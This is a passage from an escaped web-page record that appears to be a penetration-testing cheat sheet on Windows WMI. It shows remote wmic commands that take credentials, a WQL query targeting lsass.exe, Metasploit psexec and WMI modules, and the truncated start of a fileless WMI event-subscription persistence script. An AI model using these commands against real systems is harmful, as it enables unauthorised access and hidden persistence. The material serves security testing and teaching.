\u0026gt; C:\\out.txt\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewmic /node:\u0026lt;ip\u0026gt; /user:\u0026lt;user\u0026gt; /password:\u0026lt;pass\u0026gt; useraccount list 
brief\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"wql-queries\"\u003eWQL Queries\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# WQL = WMI Query Language (SQL-like)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Query \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;SELECT * FROM Win32_Process WHERE Name=\u0026#39;lsass.exe\u0026#39;\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Query \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;SELECT * FROM Win32_Service WHERE StartMode=\u0026#39;Auto\u0026#39; AND State=\u0026#39;Stopped\u0026#39;\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eGet-WmiObject -Query \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;SELECT * FROM Win32_UserAccount WHERE LocalAccount=True\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"metasploit\"\u003eMetasploit\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse exploit/windows/smb/psexec              \u003cspan style=\"color:#75715e\"\u003e# Uses WMI/DCOM under the 
hood\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse exploit/windows/local/wmi               \u003cspan style=\"color:#75715e\"\u003e# Post-exploitation WMI persistence\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/winrm/winrm_wql       \u003cspan style=\"color:#75715e\"\u003e# WQL via WinRM\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"wmi-persistence-post-exploitation\"\u003eWMI Persistence (Post-Exploitation)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-powershell\" data-lang=\"powershell\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Create permanent WMI event subscription (fileless persistence)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e$filter = Set-WmiInstance -Class __EventFilter -Namespace \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;root\\subscription\u0026#34;\u003c/span\u003e -Arguments @{\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e    Name = \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;PentestFilter\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e    EventNameSpace = \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;root\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"WMI"}]